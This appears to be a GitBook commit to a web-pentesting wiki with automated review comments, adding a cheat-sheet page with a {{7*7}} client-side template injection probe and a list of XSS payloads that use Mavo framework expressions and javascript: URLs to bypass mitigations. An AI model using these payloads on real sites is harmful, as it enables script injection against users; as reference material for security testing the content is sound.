GitBook: [master] 3 pages modified

CPol 2021-06-25 16:39:43 +00:00 committed by gitbook-bot
parent 804dd1d0d8
commit dbdd4bb37c
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
3 changed files with 19 additions and 0 deletions

@ -336,6 +336,7 @@
## Pentesting Web
* [PoCs and Polygloths CheatSheet](pentesting-web/pocs-and-polygloths-cheatsheet.md)
* [2FA/OTP Bypass](pentesting-web/2fa-bypass.md)
* [Abusing hop-by-hop headers](pentesting-web/abusing-hop-by-hop-headers.md)
* [Bypass Payment Process](pentesting-web/bypass-payment-process.md)
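
Review bot: "Polygloths" in the new PoCs and Polygloths CheatSheet entry is a misspelling of "Polyglots", and it is carried into the link target `pocs-and-polygloths-cheatsheet.md` as well as the title. Renaming the file later breaks inbound links, so correct both in this commit. The entry also sits above 2FA/OTP Bypass while the entries after it run alphabetically; if it is meant to be pinned first that is fine, otherwise move it to its sorted position.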

@ -56,10 +56,20 @@ Credit: [Mario Heiderich](https://twitter.com/cure53berlin)
Payload:
```text
[7*7]
[(1,alert)(1)]
<div mv-expressions="{{ }}">{{top.alert(1)}}</div>
[self.alert(1)]
javascript:alert(1)%252f%252f..%252fcss-images
[Omglol mod 1 mod self.alert (1) andlol]
[''=''or self.alert(lol)]
<a data-mv-if='1 or self.alert(1)'>test</a>
<div data-mv-expressions="lolx lolx">lolxself.alert('lol')lolx</div>
<a href=[javascript&':alert(1)']>test</a>
[self.alert(1)mod1]
```
**More payloads in** [**https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations**](https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations)\*\*\*\*
\*\*\*\*
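
Review bot: the "More payloads in" line after the closing fence ends in stray escaped asterisks (`\*\*\*\*`) and is followed by a line containing only `\*\*\*\*`; this is empty-bold residue from the editor and will render as literal asterisks, so drop both. Inside the payload block, bracketed expressions, full HTML elements and a `javascript:` string are mixed with no note on which context each one belongs to; a short label per group would let a reader check that a fix covers every context.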

@ -0,0 +1,8 @@
# PoCs and Polygloths CheatSheet
### Client Side Template Injection
```text
{{7*7}}
```
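
Review bot: the only probe in the new page, `{{7*7}}`, comes with no statement of what counts as a hit. Add a sentence saying the probe is positive when the page renders 49 rather than echoing the literal string, and name the template syntaxes that use the double-brace delimiter. The heading also jumps from `#` straight to `###`; use `##` for Client Side Template Injection so the outline has no skipped level.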